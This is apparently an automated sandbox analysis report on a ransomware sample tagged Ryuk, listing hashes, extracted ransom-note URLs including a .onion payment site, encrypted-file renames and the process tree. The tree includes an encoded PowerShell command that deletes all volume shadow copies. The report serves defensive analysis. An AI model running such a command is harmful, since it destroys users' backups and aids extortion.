Analysis
-
max time kernel
141s -
max time network
167s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
24-01-2022 01:55
Static task
static1
Behavioral task
behavioral1
Sample
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe
Resource
win10-en-20211208
General
-
Target
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe
-
Size
115KB
-
MD5
f14128a3c45fdb8fc7beaf570d833560
-
SHA1
3da6ff8bffd61e763292ac3d83ac73c7d59029b8
-
SHA256
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00
-
SHA512
f7f1b7ca40ca63eeda579530151e4f961c6dbeae68633c4c113f42b898c3c777763cb1645c47298fea15ac787317424ede0fc57da8af9b98d0f5654155262cd2
Malware Config
Extracted
C:\7f0w27-readme.txt
ryuk
https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spread
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FF58B58E59AEF489
http://decryptor.cc/FF58B58E59AEF489
https://filehippo.com/download_tor_browser_for_windows/
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exedescription ioc process File renamed C:\Users\Admin\Pictures\FormatProtect.tif => \??\c:\users\admin\pictures\FormatProtect.tif.7f0w27 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File renamed C:\Users\Admin\Pictures\FormatSplit.crw => \??\c:\users\admin\pictures\FormatSplit.crw.7f0w27 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File renamed C:\Users\Admin\Pictures\SwitchConvert.raw => \??\c:\users\admin\pictures\SwitchConvert.raw.7f0w27 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File renamed C:\Users\Admin\Pictures\UnpublishReset.raw => \??\c:\users\admin\pictures\UnpublishReset.raw.7f0w27 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exedescription ioc process File opened (read-only) \??\Z: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\D: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\G: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\H: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\K: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\O: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\W: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\B: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\I: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\N: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\P: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\V: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\X: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\A: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\E: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\F: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\S: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\T: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\U: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\Y: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\J: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\L: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\M: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\Q: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened (read-only) \??\R: 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\q6y.bmp" 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Drops file in Program Files directory 34 IoCs
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exedescription ioc process File opened for modification \??\c:\program files\BackupSubmit.html 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\EditNew.tif 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\PublishInvoke.edrwx 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\ExportCopy.asf 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\SetSwitch.clr 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\UpdateRevoke.png 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\WriteRequest.cfg 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File created \??\c:\program files\7f0w27-readme.txt 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\SplitUndo.MTS 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\UnlockSync.jpeg 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\WaitReceive.pps 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\RevokeExport.vdw 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\FormatSync.mpv2 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\LockCompress.html 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\MountRepair.wmf 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\MoveLimit.php 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\PingConnect.3gpp 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\SendMount.vssx 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\7f0w27-readme.txt 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File created \??\c:\program files (x86)\7f0w27-readme.txt 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\DisconnectRename.jtx 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\DismountConnect.dib 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\MergeGroup.3gp 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\v3.5\desktop\7f0w27-readme.txt 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\AssertApprove.pps 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\ExitUse.vsdx 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\SubmitWatch.mpeg3 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\TraceDisconnect.dib 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\WaitNew.mpp 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File created \??\c:\program files (x86)\microsoft sql server compact edition\7f0w27-readme.txt 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\ExitWait.wm 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\ProtectLimit.sql 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\ResumeDisconnect.ttc 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe File opened for modification \??\c:\program files\SplitRename.m4v 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exepowershell.exepid process 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 780 powershell.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe Token: SeDebugPrivilege 780 powershell.exe Token: SeBackupPrivilege 1140 vssvc.exe Token: SeRestorePrivilege 1140 vssvc.exe Token: SeAuditPrivilege 1140 vssvc.exe Token: SeTakeOwnershipPrivilege 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exedescription pid process target process PID 1572 wrote to memory of 780 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe powershell.exe PID 1572 wrote to memory of 780 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe powershell.exe PID 1572 wrote to memory of 780 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe powershell.exe PID 1572 wrote to memory of 780 1572 662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe"C:\Users\Admin\AppData\Local\Temp\662dd60f22113b917cfec6a6ff1a3817122919fa6f0d390b6d570f896c6add00.exe"1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:536
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1140